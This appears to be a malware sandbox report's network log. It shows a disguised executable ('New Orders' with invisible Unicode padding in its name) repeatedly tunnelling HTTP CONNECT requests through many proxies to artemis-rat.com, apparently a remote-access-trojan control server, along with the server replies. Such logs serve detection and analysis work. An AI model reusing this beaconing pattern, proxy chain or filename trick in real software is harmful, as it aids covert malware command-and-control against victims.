                                                                                        Mar 11, 2024 16:16:46.053966045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1470192.168.2.953873208.102.51.6582087672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.057262897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1471192.168.2.952559185.105.185.18531287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.057265043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.070374012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.070411921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.163965940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:10.163760900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:22.163932085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:34.273325920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:58.273277044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:46.273175955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1472192.168.2.95376291.134.140.160489627672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.066776991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.538947105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.039252996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.148574114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.132975101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.132781029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1473192.168.2.954013192.252.215.5161377672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.072993994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1474192.168.2.95383291.134.140.160308957672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.073074102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.687521935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.222769976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.260776997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.242312908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1475192.168.2.95379751.250.13.88807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.073841095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.132791042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.132854939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.204154015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:10.244070053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:25.091943026 CET805INHTTP/1.1 500 Internal Server Error
                                                                                        Date: Mon, 11 Mar 2024 15:17:24 GMT
                                                                                        Server: Apache/2.4.52 (Ubuntu)
                                                                                        Content-Length: 613
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1476192.168.2.954285104.17.66.69807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.092847109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.250941038 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1477192.168.2.95425558.234.116.19781937672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.096613884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1478192.168.2.95384560.188.102.225180807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.098467112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.976197004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1479192.168.2.954204211.93.2.19073027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.098602057 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Mar 11, 2024 16:16:46.562685966 CET90INHTTP/1.1 200 OK
                                                                                        Content-Type: application/json
                                                                                        Connection: close
                                                                                        Content-Length: 55


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1480192.168.2.95256747.103.112.8688997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.110347033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.179455042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.273531914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.421765089 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1481192.168.2.954292192.154.246.9690007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.112426043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1482192.168.2.95427367.43.228.253242797672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.139780998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1483192.168.2.95258451.89.173.40545707672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.142298937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.809983969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.742624998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.648386955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1484192.168.2.954257121.66.198.7641457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.214345932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1485192.168.2.954306104.21.80.83807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.241703987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.398715973 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:46 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1486192.168.2.9542608.217.143.187156737672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.242367983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.976471901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1487192.168.2.954297129.213.150.20580807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.247718096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1488192.168.2.953898148.72.23.56423127672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:46.247850895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.367095947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.460928917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.461404085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:10.463551044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
